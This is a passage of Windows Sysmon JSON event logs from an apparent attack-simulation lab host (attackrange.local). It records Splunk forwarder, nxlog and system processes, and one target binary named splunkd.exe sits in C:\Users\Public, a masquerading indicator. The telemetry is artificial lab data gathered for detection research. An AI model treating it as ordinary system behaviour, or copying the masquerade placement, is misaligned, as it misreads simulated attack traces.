Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4058,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:55.425\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:55.425","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4059,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:55.754\r\nProcessGuid: {E2A3D6B1-110B-5F25-0000-001029D90500}\r\nProcessId: 4092\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\r\nFileVersion: 8.0.2\r\nDescription: Remote Performance monitor using WMI\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-wmi.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:55.754","ProcessGuid":"{E2A3D6B1-110B-5F25-0000-001029D90500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe","FileVersion":"8.0.2","Description":"Remote Performance monitor using WMI","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-wmi.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4060,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:55.753\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-110B-5F25-0000-001029D90500}\r\nTargetProcessId: 4092\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:55.753","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-110B-5F25-0000-001029D90500}","TargetProcessId":"4092","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4061,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:55.753\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-110B-5F25-0000-001029D90500}\r\nTargetProcessId: 4092\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:55.753","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-110B-5F25-0000-001029D90500}","TargetProcessId":"4092","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4062,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:55.753\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:55.753","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4063,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:55.753\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:55.753","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4064,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:55.753\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:55.753","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4065,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:55.753\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:55.753","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
